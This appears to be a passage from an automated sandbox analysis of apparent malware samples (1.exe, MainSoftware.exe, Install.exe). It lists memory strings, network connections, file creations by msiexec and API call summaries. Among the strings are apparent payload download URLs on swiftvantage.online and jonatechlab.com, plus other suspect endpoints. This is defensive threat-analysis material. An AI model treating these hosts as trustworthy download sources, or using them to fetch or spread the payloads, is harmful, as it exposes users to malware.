    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2489752761.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000009.00000000.2402662552.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet/app-launch-failed
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2489752761.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000009.00000000.2402662552.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet/download
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2489752761.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000009.00000000.2402662552.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet/download%s%sInstall
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2489752761.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000009.00000000.2402662552.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet/info
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2489752761.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000009.00000000.2402662552.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet/sdk-not-foundProbing
    Source: Install.exeString found in binary or memory: https://aka.ms/nativeaot-c
    Source: MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A871000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
    Source: 1.exe, 00000000.00000003.1953629935.000000000C7B7000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2453268537.0000020993E30000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2454027142.0000020995879000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455666591.0000024A2B101000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/FantasticFiasco/serilog-sinks-http.git
    Source: 1.exe, 00000000.00000003.1953629935.000000000C902000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dot
    Source: 1.exe, 00000000.00000003.1953629935.000000000CC7B000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000CC11000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000C8F7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000C7E7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000CC6C000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000C986000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000C859000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000C843000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000C7FB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000C850000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000C8EC000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000C7E0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000CBDF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000CC23000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000CBF4000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000C7C6000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000C7F4000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000C7D8000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000C981000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000C932000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000CC29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime
    Source: MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3DE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A871000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/dotnet/runtime/blob/bbc898f3e5678135b242faeb6eefd8b24bf04f3c/src/native/corehost/
    Source: MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3DE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A871000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/dotnet/runtime/issues/71847
    Source: MainSoftware.exe, 00000009.00000002.2457323456.0000024A2D227000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/dotnet/runtimeE
    Source: MainSoftware.exe, 00000009.00000002.2459150036.0000024A2D5D5000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/dotnet/runtimeGk
    Source: MainSoftware.exe, 00000009.00000002.2459150036.0000024A2D5D9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2487355105.0000021DEA179000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/dotnet/runtimet
    Source: MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3DE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A871000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/mono/linker/issues/378
    Source: MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3DE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A871000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/mono/linker/pull/649
    Source: 1.exe, 00000000.00000003.1953629935.000000000C7A1000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2453861770.00000209957FD000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453952929.0000020995831000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453659363.0000020993F00000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2482413470.0000021DE7EF0000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2482321883.0000021DE7EC1000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/serilog/serilog
    Source: 1.exe, 00000000.00000003.1953629935.000000000C7B2000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2454007339.0000020995861000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453659363.0000020993F08000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/serilog/serilog-formatting-compact
    Source: MainSoftware.exe, 00000009.00000002.2454027142.0000020995870000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/serilog/serilog-sinks-file
    Source: MainSoftware.exe, 00000009.00000002.2454027142.0000020995870000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/serilog/serilog-sinks-fileC
    Source: MainSoftware.exe, 00000009.00000002.2453377610.0000020993E41000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453268537.0000020993E37000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://jonatechlab.com%/install/getfiles/
    Source: MainSoftware.exe, 00000009.00000002.2455615364.0000024A2AD00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://jonatechlab.com/install/new
    Source: MainSoftware.exe, 00000009.00000002.2453377610.0000020993E41000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453268537.0000020993E37000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://jonatechlab.com/install/whattoinstall/Ghttps://jonatechlab.com/install/new
    Source: MainSoftware.exe, 00000009.00000002.2455615364.0000024A2AD00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://jonatechlab.com/logs/telemetry
    Source: MainSoftware.exe, 00000009.00000002.2453377610.0000020993E41000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453268537.0000020993E37000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://jonatechlab.com/logs/telemetry-MyPersistentApp_Hourly
    Source: MainSoftware.exe, 00000009.00000002.2453377610.0000020993E41000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453268537.0000020993E37000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://jonatechlab.comH123e4567-e89b-12d3-a456-426614174000
    Source: 1.exe, 00000000.00000003.2577634988.0000000008483000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.2589870919.0000000008487000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2552341866.0000000008AF0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547718570.0000000004FFB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1880749338.0000000004FB9000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1881378531.0000000004FBA000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.2545951792.0000000004FFB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886321530.0000000004FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p1-ag5.pages.dev?source_id=1
    Source: 1.exe, 00000000.00000002.2589545091.0000000008460000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2581176945.000000000845F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1698765145.00000000084E9000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1880749338.0000000004FB9000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1881378531.0000000004FBA000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.2545951792.0000000004FFB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886321530.000000000501E000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886321530.0000000004FFA000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1881434911.0000000004FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swiftvantage.online/tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Install.exe
    Source: 1.exe, 00000000.00000003.1697942133.00000000099F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://swiftvantage.online/tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Install.exe1Surfclu
    Source: 1.exe, 00000004.00000002.2547718570.0000000004FFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swiftvantage.online/tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Install.exes
    Source: 1.exe, 00000004.00000003.1886321530.0000000004FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swiftvantage.online/tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Surfclub.pkg
    Source: 1.exe, 00000000.00000003.2581660176.00000000055DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.2584665153.00000000055DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2580654380.00000000055DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swiftvantage.online/tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Surfclub.pkg4
    Source: Install.exeString found in binary or memory: https://wetransfers.io/v.php
    Source: 1.exe, 00000000.00000002.2589385517.0000000008450000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ssl.
    Source: 1.exe, 00000000.00000003.2546181506.00000000084DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.2590336705.00000000084DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ssl.c8
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2546181506.00000000084DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000D3CB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.2590336705.00000000084DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.2590533267.000000000A5B0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1699505082.0000000008501000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886296929.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547718570.0000000004FFB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1885809203.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.2545951792.0000000004FFB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1882325597.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886321530.0000000004FFA000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547718570.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2552341866.0000000008AFE000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547608379.0000000004F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ssl.com/repository0
    Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
    Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
    Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
    Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
    Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
    Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
    Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
    Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
    Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
    Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
    Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
    Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
    Source: unknownHTTPS traffic detected: 104.21.80.136:443 -> 192.168.2.4:49740 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.6.210:443 -> 192.168.2.4:49842 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.6.210:443 -> 192.168.2.4:49844 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.59.228:443 -> 192.168.2.4:49882 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.80.136:443 -> 192.168.2.4:49900 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49920 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.80.136:443 -> 192.168.2.4:49932 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49944 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.59.228:443 -> 192.168.2.4:49952 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49961 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.80.136:443 -> 192.168.2.4:49963 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49991 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.80.136:443 -> 192.168.2.4:50001 version: TLS 1.2
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_008915F0 SendMessageW,GetParent,GetWindowRect,GetParent,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,MapWindowPoints,FillRect,DeleteDC,SendMessageW,SendMessageW,0_2_008915F0
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00902A40 NtdllDefWindowProc_W,0_2_00902A40
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00768020 GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,NtdllDefWindowProc_W,GetWindowTextLengthW,GetWindowTextW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,NtdllDefWindowProc_W,0_2_00768020
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_007E4640 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,0_2_007E4640
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_007687F0 SysFreeString,SysAllocString,GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,GetWindowTextLengthW,GetWindowTextW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,SysFreeString,SysFreeString,0_2_007687F0
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00768EA0 NtdllDefWindowProc_W,GetSysColor,0_2_00768EA0
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00772FC0 NtdllDefWindowProc_W,0_2_00772FC0
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00781040 NtdllDefWindowProc_W,0_2_00781040
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0076B0A0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DestroyWindow,0_2_0076B0A0
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00773130 IsWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,0_2_00773130
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0078F3F0 NtdllDefWindowProc_W,0_2_0078F3F0
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0084F470 NtdllDefWindowProc_W,0_2_0084F470
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0077B650 KillTimer,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DeleteCriticalSection,0_2_0077B650
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0076B890 NtdllDefWindowProc_W,0_2_0076B890
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0076BEF0 NtdllDefWindowProc_W,0_2_0076BEF0
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_00781040 NtdllDefWindowProc_W,4_2_00781040
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_00768020 NtdllDefWindowProc_W,NtdllDefWindowProc_W,GlobalAlloc,GlobalLock,GlobalUnlock,NtdllDefWindowProc_W,4_2_00768020
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_0076B0A0 NtdllDefWindowProc_W,4_2_0076B0A0
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_00773130 NtdllDefWindowProc_W,4_2_00773130
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_0078F3F0 NtdllDefWindowProc_W,4_2_0078F3F0
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_0084F470 NtdllDefWindowProc_W,4_2_0084F470
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_0077B650 NtdllDefWindowProc_W,DeleteCriticalSection,4_2_0077B650
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_007E4640 NtdllDefWindowProc_W,4_2_007E4640
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_0076B890 NtdllDefWindowProc_W,4_2_0076B890
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_0076BEF0 NtdllDefWindowProc_W,4_2_0076BEF0
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_00768EA0 NtdllDefWindowProc_W,4_2_00768EA0
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_00772FC0 NtdllDefWindowProc_W,4_2_00772FC0
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\69b93f.msiJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBB04.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBBC0.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBC2F.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBC8D.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{67AEF7BA-A109-4700-BE3F-0231069B1923}Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID769.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID78A.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID7F8.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID857.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE45E.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIBB04.tmpJump to behavior
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_05645E390_3_05645E39
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_05645E390_3_05645E39
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_05645E390_3_05645E39
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_05645E390_3_05645E39
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_05645E390_3_05645E39
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_05645E390_3_05645E39
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_05660A6C0_3_05660A6C
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_056726D20_3_056726D2
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_008FA6E00_2_008FA6E0
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_008E26300_2_008E2630
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00918DB00_2_00918DB0
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_008CCF300_2_008CCF30
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_008D10500_2_008D1050
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_007953600_2_00795360
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_008BDB900_2_008BDB90
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00781CB00_2_00781CB0
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0091A0300_2_0091A030
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_009101200_2_00910120
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_009184A00_2_009184A0
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_007825100_2_00782510
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0079A5E00_2_0079A5E0
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_008BA6600_2_008BA660
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_007987E00_2_007987E0
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_009647400_2_00964740
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_009228C00_2_009228C0
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_009048300_2_00904830
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00790B100_2_00790B10
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00788C300_2_00788C30
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00784D430_2_00784D43
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00994D200_2_00994D20
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_009192200_2_00919220
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_007E93500_2_007E9350
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_007533E00_2_007533E0
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0096B3500_2_0096B350
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_007874100_2_00787410
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_009A74390_2_009A7439
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0079F4A00_2_0079F4A0
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_007514900_2_00751490
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0077D6700_2_0077D670
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_007736700_2_00773670
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_008C16900_2_008C1690
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_007A76D00_2_007A76D0
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_009A17100_2_009A1710
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00757A000_2_00757A00
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_009A1A700_2_009A1A70
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00791D700_2_00791D70
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0098BEEE0_2_0098BEEE
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00891E500_2_00891E50
